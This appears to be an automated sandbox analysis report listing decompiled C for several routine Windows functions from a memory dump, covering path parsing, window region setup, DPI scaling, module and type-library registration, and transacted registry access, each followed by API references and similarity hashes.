0x00cb3152
0x00cb3156
0x00cb3158
0x00cb315d
0x00cb315f
0x00cb3163
0x00cb324c
0x00cb324c
0x00cb3169
0x00cb3169
0x00cb316c
0x00cb3172
0x00000000
0x00cb31f3
0x00cb31f6
0x00cb31ff
0x00cb31f8
0x00cb31f8
0x00cb31f8
0x00cb3203
0x00000000
0x00000000
0x00cb3206
0x00cb320e
0x00cb3210
0x00cb3212
0x00cb3215
0x00cb3225
0x00000000
0x00cb3227
0x00cb3227
0x00cb322a
0x00cb322e
0x00cb3230
0x00cb3233
0x00cb3235
0x00cb3236
0x00cb3237
0x00cb323b
0x00cb323b
0x00cb323d
0x00cb323f
0x00cb3243
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb3243
0x00000000
0x00cb3245
0x00cb3245
0x00000000
0x00cb3174
0x00cb3175
0x00cb317b
0x00cb31d8
0x00cb3188
0x00000000
0x00cb318a
0x00cb318a
0x00cb318f
0x00cb3198
0x00cb319a
0x00cb319a
0x00cb319d
0x00cb31a5
0x00cb31a7
0x00cb31a9
0x00cb31ac
0x00cb31bc
0x00000000
0x00cb31c2
0x00cb31c2
0x00cb31c5
0x00cb31c9
0x00cb31cb
0x00cb31ce
0x00cb31d0
0x00cb31d1
0x00cb31d2
0x00cb31d6
0x00cb31d6
0x00000000
0x00cb31c9
0x00cb31bc
0x00000000
0x00cb3188
0x00cb31e2
0x00000000
0x00cb31e4
0x00cb31e4
0x00cb31ef
0x00cb3248
0x00cb3248
0x00cb3248
0x00cb31e2
0x00cb3172
0x00cb3251
0x00cb3255

APIs

Part of subcall function 00CB3129: CharNextA.USER32(?,?,00CB315D), ref: 00CB3143

CharNextA.USER32 ref: 00CB3175
CharNextA.USER32 ref: 00CB3192
CharNextA.USER32(00000000), ref: 00CB319D
CharNextA.USER32 ref: 00CB31E9
CharNextA.USER32 ref: 00CB3206

Strings

', xrefs: 00CB318C

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID: '
API String ID: 3213498283-1997036262
Opcode ID: c5672760d9bd7a8d978bf12bb5fe88984ec191e6cb1bd986a8d643b1fc28b6c7
Instruction ID: df884a28b0ecac74f6ab34c865909f175a37723d1267da0ba2bfb34e518dbfd6
Opcode Fuzzy Hash: c5672760d9bd7a8d978bf12bb5fe88984ec191e6cb1bd986a8d643b1fc28b6c7
Instruction Fuzzy Hash: 5931C274A042C69FDB298F3DC8947ED7BE6AF6A384F24496DD5C2CB313E6309A418711

Uniqueness

Uniqueness Score: -1.00%

Function 00CB759B, Relevance: 9.1, APIs: 6, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00CB759B(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, RECT* _a4, RECT* _a8) {
				signed int _v8;
				struct tagRECT _v24;
				intOrPtr _v28;
				signed int _t20;
				RECT* _t46;
				RECT* _t52;
				struct HRGN__* _t59;
				intOrPtr _t60;
				signed int _t61;

				_t20 =  *0xd0f014; // 0xbb5e653b
				_v8 = _t20 ^ _t61;
				_t52 = _a8;
				_t46 = _a4;
				_v28 = __ecx;
				if(_t46 != 0 && _t52 != 0) {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x3c)))) != 0) {
						_t59 = 0;
						if(IntersectRect( &_v24, _t46, _t52) != 0 && EqualRect( &_v24, _t46) == 0) {
							OffsetRect( &_v24,  ~(_t46->left),  ~(_t46->top));
							_t59 = CreateRectRgnIndirect( &_v24);
						}
						_t60 = _v28;
						SetWindowRgn( *( *(_t60 + 0x3c)), _t59, 1);
						SetWindowPos( *( *(_t60 + 0x3c)), 0, _t46->left, _t46->top, _t46->right -  *_t46, _t46->bottom - _t46->top, 0x14);
					}
				}
				return E00CBDC11(_v8 ^ _t61);
			}

0x00cb75a1
0x00cb75a8
0x00cb75ab
0x00cb75b1
0x00cb75b4
0x00cb75b9
0x00cb75d1
0x00cb75d2
0x00cb75d3
0x00cb75d4
0x00cb75d8
0x00cb75df
0x00cb75ea
0x00cb760a
0x00cb761a
0x00cb761a
0x00cb761f
0x00cb7627
0x00cb7648
0x00cb7648
0x00cb7651
0x00cb7665

APIs

IntersectRect.USER32 ref: 00CB75E2
EqualRect.USER32 ref: 00CB75F1
OffsetRect.USER32(?,?,?), ref: 00CB760A
CreateRectRgnIndirect.GDI32(?), ref: 00CB7614
SetWindowRgn.USER32 ref: 00CB7627
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 00CB7648

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$CreateEqualIndirectIntersectOffset
String ID:
API String ID: 3762251641-0
Opcode ID: a7adea023dc45e881a7d2b9b0817e16ed4353a93a6c351d58b6496939c8f4c6b
Instruction ID: 200acd626cb29dfe5c83136ec2f406f9338697ff9b03284883dbff3866d5d267
Opcode Fuzzy Hash: a7adea023dc45e881a7d2b9b0817e16ed4353a93a6c351d58b6496939c8f4c6b
Instruction Fuzzy Hash: 71216D71600605AFDB11DFA8CD88FAABBB8EF49300F044569FD05EB261EA70ED00CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CB6476, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00CB6476(void* __ebx, int* __ecx, int* __edx, void* __edi, void* __esi) {
				int* _v8;
				int* _v12;
				int _v16;
				int _t35;
				int _t39;
				int _t41;
				int* _t45;
				struct HDC__* _t49;
				int* _t50;

				_t46 = __edx;
				_t45 = __ecx;
				_v8 = __ecx;
				_v12 = __edx;
				if(__ecx == 0 || __edx == 0) {
					_push(0x80004003);
					L00CB1410(_t46);
					asm("int3");
					_t45[1] = 0;
					_t45[2] = 0;
					_t45[3] = 0;
					_t45[4] = 0;
					_t45[5] = 0;
					_t45[6] = 0;
					_t45[0x11] = _t45[0x11] & 0xffffc000;
					_t45[0xf] = _v16;
					_t45[9] = 0x13d8;
					_t45[0xa] = 0x13d8;
					_t45[7] = 0x13d8;
					_t45[8] = 0x13d8;
					_t45[0xb] = 0;
					_t45[0xd] = 0;
					_t45[0xc] = 0;
					_t45[0xe] = 0;
					_t45[0x10] = 0;
					return _t45;
				} else {
					_t49 = GetDC(0);
					_t35 = GetDeviceCaps(_t49, 0x58);
					_v16 = GetDeviceCaps(_t49, 0x5a);
					ReleaseDC(0, _t49);
					_t39 = MulDiv(_t35,  *_v8, 0x9ec);
					_t50 = _v12;
					 *_t50 = _t39;
					_t41 = MulDiv(_v16, _v8[1], 0x9ec);
					_t50[1] = _t41;
					return _t41;
				}
			}

0x00cb6476
0x00cb6476
0x00cb647c
0x00cb6481
0x00cb6486
0x00cb64e7
0x00cb64ec
0x00cb64f1
0x00cb64fa
0x00cb64fd
0x00cb6500
0x00cb6503
0x00cb6506
0x00cb6509
0x00cb650c
0x00cb6513
0x00cb651b
0x00cb651e
0x00cb6521
0x00cb6524
0x00cb6529
0x00cb652c
0x00cb652f
0x00cb6532
0x00cb6535
0x00cb6539
0x00cb648c
0x00cb649d
0x00cb64a2
0x00cb64ae
0x00cb64b1
0x00cb64c8
0x00cb64ca
0x00cb64d2
0x00cb64dd
0x00cb64df
0x00cb64e6
0x00cb64e6

APIs

GetDC.USER32(00000000), ref: 00CB6491
GetDeviceCaps.GDI32(00000000,00000058), ref: 00CB64A2
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CB64A9
ReleaseDC.USER32 ref: 00CB64B1
MulDiv.KERNEL32(00000000,?,000009EC), ref: 00CB64C8
MulDiv.KERNEL32(?,?,000009EC), ref: 00CB64DD

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: bb58c9bcf08c12c886cd29a7445a219e8e0b1abdc339d2d7a76a0984081bfd4d
Instruction ID: 55fc7e1acccf6a47033c3a730b2fea9f77b17a613ac308bef6a5f90785467f2d
Opcode Fuzzy Hash: bb58c9bcf08c12c886cd29a7445a219e8e0b1abdc339d2d7a76a0984081bfd4d
Instruction Fuzzy Hash: 3A012175A00209BBEB109BA9DC09F9EBFB8EF48751F148066FA05E72A1D6709D00DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00CB40DF, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 193
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00CB40DF(void* __ebx, void* __edi, CHAR* _a4) {
				signed int _v8;
				char _v268;
				char _v1314;
				CHAR* _v1316;
				char _v2356;
				unsigned int _v2360;
				CHAR* _v2364;
				CHAR* _v2372;
				CHAR* _v2376;
				CHAR* _v2380;
				char _v2384;
				struct HINSTANCE__* _v2388;
				void* _v2400;
				signed int _t42;
				struct HINSTANCE__* _t49;
				long _t50;
				unsigned int _t53;
				CHAR* _t54;
				void* _t55;
				CHAR* _t60;
				signed int _t63;
				void* _t64;
				CHAR* _t66;
				char* _t68;
				CHAR* _t87;
				intOrPtr* _t88;
				CHAR* _t102;
				CHAR* _t103;
				CHAR* _t114;
				CHAR* _t120;
				CHAR* _t126;
				CHAR* _t127;
				CHAR* _t128;
				signed int _t131;
				signed int _t133;
				void* _t134;
				void* _t137;

				_t131 = _t133;
				_t134 = _t133 - 0x950;
				_t42 =  *0xd0f014; // 0xbb5e653b
				_v8 = _t42 ^ _t131;
				_t88 =  *0xe3a408; // 0xe3a50c
				_push(__ebx);
				_push(__edi);
				_push( &_v2384);
				_v2384 = 0xd07d20;
				_v2380 = 0;
				_v2376 = 0;
				_v2372 = 0;
				if( *((intOrPtr*)( *_t88 + 0x14))() < 0) {
					L17:
					E00CB2B4A( &_v2384, _t139);
					goto L18;
				} else {
					_t49 =  *0xe3910c; // 0xcb0000
					_v2388 = _t49;
					_t126 = 0;
					_v2364 = 0;
					_t50 = GetModuleFileNameA(_t49,  &_v268, 0x104);
					_t139 = _t50;
					if(_t50 != 0) {
						__eflags = _t50 - 0x104;
						if(__eflags != 0) {
							_t53 = E00CDBFC0( &_v268) + 1;
							_t111 = _t53;
							_v2360 = _t53;
							_t54 = E00CB1160( &_v2360, _t53);
							_t137 = _t134 + 4;
							__eflags = _t54;
							if(__eflags < 0) {
								L16:
								goto L17;
							} else {
								_t118 = _v2360;
								__eflags = _v2360 - 0x400;
								if(__eflags > 0) {
									L9:
									_t55 = E00CB9AD3( &_v2364, _t111, __eflags, _t118);
									_t126 = _v2364;
								} else {
									__eflags = E00CB11E1(_t118, __eflags);
									if(__eflags == 0) {
										goto L9;
									} else {
										E00CBEB70();
										_t55 = _t137;
									}
								}
								_t87 = E00CB1255(_t55,  &_v268, _t118 >> 1, 3);
								__eflags = _t87;
								if(_t87 == 0) {
									while(1) {
										__eflags = _t126;
										if(__eflags == 0) {
											goto L16;
										}
										_t126 =  *_t126;
										E00CDC163(_t126);
									}
									goto L16;
								} else {
									E00CB24E8( &_v2356, 0x208, _t87);
									_t120 = _v2388;
									_pop(0);
									__eflags = _t120;
									if(_t120 == 0) {
										L19:
										_t120 = 0x22;
										_v1316 = _t120;
										_t60 = E00CB12CB( &_v1314,  &_v2356);
										__eflags = _t60;
										if(_t60 == 0) {
											while(1) {
												__eflags = _t126;
												if(__eflags == 0) {
													break;
												}
												_t126 =  *_t126;
												E00CDC163(_t126);
											}
											goto L17;
										} else {
											_t63 = E00CDCACF( &_v1316);
											_pop(_t102);
											 *(_t131 + _t63 * 2 - 0x520) = _t120;
											_t64 = 2 + _t63 * 2;
											__eflags = _t64 - 0x418;
											if(_t64 >= 0x418) {
												E00CBE08B();
												asm("int3");
												_push(_t126);
												_t66 = _t102;
												_t127 = 0;
												while(1) {
													_t103 =  *_t66;
													__eflags = _t103;
													if(_t103 == 0) {
														break;
													}
													__eflags = _t103 - 0x2e;
													if(_t103 == 0x2e) {
														_t127 = _t66;
													} else {
														__eflags = _t103 - 0x5c;
														if(_t103 == 0x5c) {
															_t127 = 0;
														}
													}
													_t66 = CharNextA(_t66);
												}
												__eflags = _t127;
												_t128 =  ==  ? _t66 : _t127;
												__eflags = _t128;
												return _t128;
											} else {
												__eflags = 0;
												 *((short*)(_t131 + _t64 - 0x520)) = 0;
												_t68 =  &_v1316;
												goto L22;
											}
										}
									} else {
										__eflags = _t120 - GetModuleHandleA(0);
										if(__eflags == 0) {
											goto L19;
										} else {
											_t68 =  &_v2356;
											L22:
											_push(_t68);
											_push(L"Module");
											_push( &_v2384);
											_t121 = E00CB2B8F(_t87, 0, 0x208, _t120, __eflags);
											__eflags = _t70;
											if(__eflags < 0) {
												while(1) {
													__eflags = _t126;
													if(__eflags == 0) {
														goto L31;
													}
													_t126 =  *_t126;
													E00CDC163(_t126);
												}
												goto L31;
											} else {
												_push( &_v2356);
												_push(L"Module_Raw");
												_push( &_v2384);
												_t121 = E00CB2B8F(_t87, 0, 0x208, _t121, __eflags);
												__eflags = _t121;
												if(_t121 < 0) {
													while(1) {
														__eflags = _t126;
														if(__eflags == 0) {
															break;
														}
														_t126 =  *_t126;
														E00CDC163(_t126);
													}
													L31:
													goto L17;
												} else {
													__eflags = _a4;
													_t114 = _t87;
													_push(0);
													_push(0);
													if(__eflags == 0) {
														E00CB2F54(_t87,  &_v2384, _t114, _t121, __eflags);
													} else {
														E00CB2EAA(_t87,  &_v2384, _t114, _t121, __eflags);
													}
													while(1) {
														__eflags = _t126;
														if(__eflags == 0) {
															break;
														}
														_t126 =  *_t126;
														E00CDC163(_t126);
													}
													E00CB2B4A( &_v2384, __eflags);
												}
											}
											L18:
											return E00CBDC11(_v8 ^ _t131);
										}
									}
								}
							}
						} else {
							goto L17;
						}
					} else {
						E00CB15CD();
						goto L17;
					}
				}
			}

0x00cb40e0
0x00cb40e2
0x00cb40e8
0x00cb40ef
0x00cb40f2
0x00cb40fe
0x00cb4100
0x00cb4105
0x00cb4106
0x00cb4110
0x00cb4116
0x00cb411c
0x00cb4129
0x00cb4232
0x00cb4238
0x00000000
0x00cb412f
0x00cb412f
0x00cb413f
0x00cb4147
0x00cb414a
0x00cb4150
0x00cb4156
0x00cb4158
0x00cb4166
0x00cb4168
0x00cb4180
0x00cb4187
0x00cb4189
0x00cb418f
0x00cb4194
0x00cb4197
0x00cb4199
0x00cb422d
0x00000000
0x00cb419f
0x00cb419f
0x00cb41a5
0x00cb41ab
0x00cb41c3
0x00cb41ca
0x00cb41cf
0x00cb41ad
0x00cb41b4
0x00cb41b6
0x00000000
0x00cb41b8
0x00cb41ba
0x00cb41bf
0x00cb41bf
0x00cb41b6
0x00cb41e7
0x00cb41e9
0x00cb41eb
0x00cb4229
0x00cb4229
0x00cb422b
0x00000000
0x00000000
0x00cb4221
0x00cb4223
0x00cb4228
0x00000000
0x00cb41ed
0x00cb41f9
0x00cb41fe
0x00cb4204
0x00cb4205
0x00cb4207
0x00cb4256
0x00cb4258
0x00cb425f
0x00cb426d
0x00cb4273
0x00cb4275
0x00cb4308
0x00cb4308
0x00cb430a
0x00000000
0x00000000
0x00cb4300
0x00cb4302
0x00cb4307
0x00000000
0x00cb427b
0x00cb4282
0x00cb4287
0x00cb4288
0x00cb4290
0x00cb4297
0x00cb429c
0x00cb4361
0x00cb4366
0x00cb4367
0x00cb4368
0x00cb436a
0x00cb4385
0x00cb4385
0x00cb4387
0x00cb4389
0x00000000
0x00000000
0x00cb436e
0x00cb4371
0x00cb437c
0x00cb4373
0x00cb4373
0x00cb4376
0x00cb4378
0x00cb4378
0x00cb4376
0x00cb437f
0x00cb437f
0x00cb438b
0x00cb438d
0x00cb438d
0x00cb4393
0x00cb42a2
0x00cb42a2
0x00cb42a4
0x00cb42ac
0x00000000
0x00cb42ac
0x00cb429c
0x00cb4209
0x00cb4211
0x00cb4213
0x00000000
0x00cb4215
0x00cb4215
0x00cb42b2
0x00cb42b2
0x00cb42b3
0x00cb42be
0x00cb42c4
0x00cb42c6
0x00cb42c8
0x00cb431f
0x00cb431f
0x00cb4321
0x00000000
0x00000000
0x00cb4317
0x00cb4319
0x00cb431e
0x00000000
0x00cb42ca
0x00cb42d0
0x00cb42d1
0x00cb42dc
0x00cb42e2
0x00cb42e4
0x00cb42e6
0x00cb4333
0x00cb4333
0x00cb4335
0x00000000
0x00000000
0x00cb432b
0x00cb432d
0x00cb4332
0x00cb4323
0x00000000
0x00cb42e8
0x00cb42e8
0x00cb42ec
0x00cb42ee
0x00cb42ef
0x00cb42f6
0x00cb4339
0x00cb42f8
0x00cb42f8
0x00cb42f8
0x00cb434b
0x00cb434b
0x00cb434d
0x00000000
0x00000000
0x00cb4343
0x00cb4345
0x00cb434a
0x00cb4355
0x00cb435a
0x00cb42e6
0x00cb423f
0x00cb4253
0x00cb4253
0x00cb4213
0x00cb4207
0x00cb41eb
0x00cb416a
0x00000000
0x00cb416a
0x00cb415a
0x00cb415a
0x00000000
0x00cb415f
0x00cb4158

APIs

GetModuleFileNameA.KERNEL32(00CB0000,?,00000104), ref: 00CB4150

Part of subcall function 00CB15CD: GetLastError.KERNEL32(00CB2D80), ref: 00CB15CD

Strings

Module, xrefs: 00CB42B3
Module_Raw, xrefs: 00CB42D1

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastModuleName
String ID: Module$Module_Raw
API String ID: 2776309574-3885325121
Opcode ID: c74adb5465dfa8e5de76d9d7050e01987ce755bfef2ca9844526001cdbe17459
Instruction ID: b28e83f12ccaace6a31286ef92d8e97d8682c1f4690302038a820453922607d9
Opcode Fuzzy Hash: c74adb5465dfa8e5de76d9d7050e01987ce755bfef2ca9844526001cdbe17459
Instruction Fuzzy Hash: BD612572D052298BDB28DF58DC90BEE73B4AF84320F1400A9E909A7253DB309F85DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00CB49EF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00CB49EF(void* __ecx, void* __eflags) {
				signed int _v8;
				char _v12;
				signed int _v16;
				void* __esi;
				signed int _t24;
				intOrPtr* _t27;
				void* _t31;
				intOrPtr* _t32;
				struct HINSTANCE__* _t34;
				void* _t36;
				intOrPtr _t40;
				intOrPtr* _t43;
				void* _t44;
				void* _t45;
				void* _t46;

				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t46 = E00CB43A8(_t36, __ecx, _t44, _t45,  &_v16,  &_v8);
				if(_t46 >= 0) {
					_t27 = _v8;
					_t46 =  *((intOrPtr*)( *_t27 + 0x1c))(_t27,  &_v12);
					if(_t46 >= 0) {
						if( *0xe3a40c != 1) {
							L5:
							_t43 = __imp__#186;
						} else {
							_t34 = GetModuleHandleW(L"OLEAUT32.DLL");
							if(_t34 == 0) {
								goto L5;
							} else {
								_t43 = GetProcAddress(_t34, "UnRegisterTypeLibForUser");
								if(_t43 == 0) {
									goto L5;
								}
							}
						}
						_t40 = _v12;
						_t31 =  *_t43(_t40,  *(_t40 + 0x18) & 0x0000ffff,  *(_t40 + 0x1a) & 0x0000ffff,  *((intOrPtr*)(_t40 + 0x10)),  *((intOrPtr*)(_t40 + 0x14)));
						_t46 = _t31;
						_t32 = _v8;
						 *((intOrPtr*)( *_t32 + 0x30))(_t32, _v12);
					}
				}
				_t24 = _v8;
				if(_t24 != 0) {
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				__imp__#6(_v16);
				return _t46;
			}

0x00cb49f5
0x00cb49fc
0x00cb4a0b
0x00cb4a0f
0x00cb4a11
0x00cb4a1e
0x00cb4a22
0x00cb4a2b
0x00cb4a4e
0x00cb4a4e
0x00cb4a2d
0x00cb4a32
0x00cb4a3a
0x00000000
0x00cb4a3c
0x00cb4a48
0x00cb4a4c
0x00000000
0x00000000
0x00cb4a4c
0x00cb4a3a
0x00cb4a54
0x00cb4a68
0x00cb4a6d
0x00cb4a6f
0x00cb4a75
0x00cb4a75
0x00cb4a22
0x00cb4a78
0x00cb4a7d
0x00cb4a82
0x00cb4a82
0x00cb4a88
0x00cb4a92

APIs

Part of subcall function 00CB43A8: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00CB43F6

GetModuleHandleW.KERNEL32(OLEAUT32.DLL), ref: 00CB4A32
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00CB4A42
SysFreeString.OLEAUT32(00000000), ref: 00CB4A88

Strings

OLEAUT32.DLL, xrefs: 00CB4A2D
UnRegisterTypeLibForUser, xrefs: 00CB4A3C

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$AddressFileFreeHandleNameProcString
String ID: OLEAUT32.DLL$UnRegisterTypeLibForUser
API String ID: 815855407-2196524522
Opcode ID: 73a8b3b3d30d1345183c58bf446b6929ad1206d3f5b984291420d800a4c5b4af
Instruction ID: 6f4490a48ef5dc20cb0ceec42a488daa19d0e5a43ca3eb9d3b0a29b2e9e765e6
Opcode Fuzzy Hash: 73a8b3b3d30d1345183c58bf446b6929ad1206d3f5b984291420d800a4c5b4af
Instruction Fuzzy Hash: 62116D71A00214AFCF15DFA4C808BAEBBB9AF48715F204198E805EB261DB35DE46DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CB2104, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00CB2104(intOrPtr* __ecx, void* _a4, char* _a8, void** _a32, int* _a36) {
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t14;
				intOrPtr* _t18;

				_t18 = __ecx;
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						L6:
						return 1;
					}
					return RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x2001f, 0, _a32, _a36);
				}
				_t13 = GetModuleHandleA("Advapi32.dll");
				if(_t13 == 0) {
					goto L6;
				}
				_t14 = GetProcAddress(_t13, "RegCreateKeyTransactedA");
				if(_t14 == 0) {
					goto L6;
				}
				return  *_t14(_a4, _a8, 0, 0, 0, 0x2001f, 0, _a32, _a36,  *_t18, 0);
			}

0x00cb2108
0x00cb210f
0x00cb214f
0x00cb216e
0x00000000
0x00cb2170
0x00000000
0x00cb2166
0x00cb2116
0x00cb211e
0x00000000
0x00000000
0x00cb2126
0x00cb212e
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00CB2116
GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 00CB2126
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00CB2166

Strings

Advapi32.dll, xrefs: 00CB2111
RegCreateKeyTransactedA, xrefs: 00CB2120

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCreateHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedA
API String ID: 1964897782-1184998024
Opcode ID: 2bd79ce72916f0aba0d276b7d54ffb00400107aa68babec8f9a61896bc20e682
Instruction ID: 01313aa4f47a6cdd8ebc66e60e1c05617bd92dc5e3c7488e7bb45f072925d377
Opcode Fuzzy Hash: 2bd79ce72916f0aba0d276b7d54ffb00400107aa68babec8f9a61896bc20e682
Instruction Fuzzy Hash: 19016D31200248BADF224E9A9C0CEEF7F7EEBCAB51B044529FA59A5071C671D951EB70

Uniqueness

Uniqueness Score: -1.00%

Function 00CB20A1, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00CB20A1(intOrPtr* __ecx, void* _a4, char* _a8, int _a16, void** _a20) {
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t14;
				intOrPtr* _t18;

				_t18 = __ecx;
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						L6:
						return 1;
					}
					return RegOpenKeyExA(_a4, _a8, 0, _a16, _a20);
				}
				_t13 = GetModuleHandleA("Advapi32.dll");
				if(_t13 == 0) {
					goto L6;
				}
				_t14 = GetProcAddress(_t13, "RegOpenKeyTransactedA");
				if(_t14 == 0) {
					goto L6;
				}
				return  *_t14(_a4, _a8, 0, _a16, _a20,  *_t18, 0);
			}

0x00cb20a5
0x00cb20ac
0x00cb20e4
0x00cb20fb
0x00000000
0x00cb20fd
0x00000000
0x00cb20f3
0x00cb20b3
0x00cb20bb
0x00000000
0x00000000
0x00cb20c3
0x00cb20cb
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00CB20B3
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 00CB20C3
RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00CB20F3

Strings

RegOpenKeyTransactedA, xrefs: 00CB20BD
Advapi32.dll, xrefs: 00CB20AE

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedA
API String ID: 1337834000-496252237
Opcode ID: e8d96c52a0aeb30db5e821df0aa43a8adb1f5184fc487dc7a990afd930e69c73
